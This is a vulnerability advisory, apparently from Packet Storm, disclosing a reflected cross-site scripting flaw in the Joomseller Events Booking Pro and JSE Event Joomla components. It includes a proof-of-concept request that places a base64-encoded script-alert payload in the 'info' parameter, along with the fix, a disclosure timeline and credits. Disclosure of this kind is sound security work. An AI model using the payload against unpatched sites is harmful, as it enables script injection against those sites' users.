Joomseller Events Booking Pro version 5 and JSE Event versions prior to 1.0.1 suffer from a reflective cross site scripting vulnerability.
d7e6b907afc1ec41cdce14807e9e5304c5ae58bfd6f48ea3a7a8eea0b35d1183----------------------------------------------------------------------------------------------
Joomseller "Events Booking Pro" and "JSE Event" reflected XSS
----------------------------------------------------------------------------------------------
[+] Software Link:
http://www.joomseller.com/joomla-components/jse-event.html
[+] Affected Versions:
Component com_events_booking_v5
Component com_jse_event < 1.0.1
[+] Vulnerability Description:
The vulnerable files are the following:
.- For JSE Event:
/modules/mod_jse_mini_calendar/tmpl/tootip.php
.-For Events Booking pro:
/modules/mod_eb_v5_mini_calendar/tmpl/tootip.php
The "info" parameter is not correctly sanitized before being used,
allowing an attacker to perform XSS attacks.
As a proof of concept, an attacker could perform the following request:
http://example.com/modules/mod_eb_v5_mini_calendar/tmpl/tootip.php?info=eyJldmVudHMiOiIoMTU6MDA6MDApIDxzY3JpcHQ%2BYWxlcnQoMSk7PC9zY3JpcHQ%2BIiwgImV2ZW50X2lkIjoiNjQiLCAiaXRlbWlkIjoiMSIsICJldnJfaWQiOiIxMTkxIn0%3D
where the contents of the info parameter is the following payload
encoded using base64 encoding
{"events":"(15:00:00) <script>alert(1);</script>", "event_id":"64",
"itemid":"1", "evr_id":"1191"}
[+] Solution:
Upgrade to JSE Event version 1.0.1.
[+] Report Timeline:
[30/07/2013] - Vulnerability reported to the vendor
[30/07/2013] - Developer confirm vulnerability and update released
[05/08/2013] - Public disclosure
[+] Credits:
Vulnerability discovered by Gaston Traberg.
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed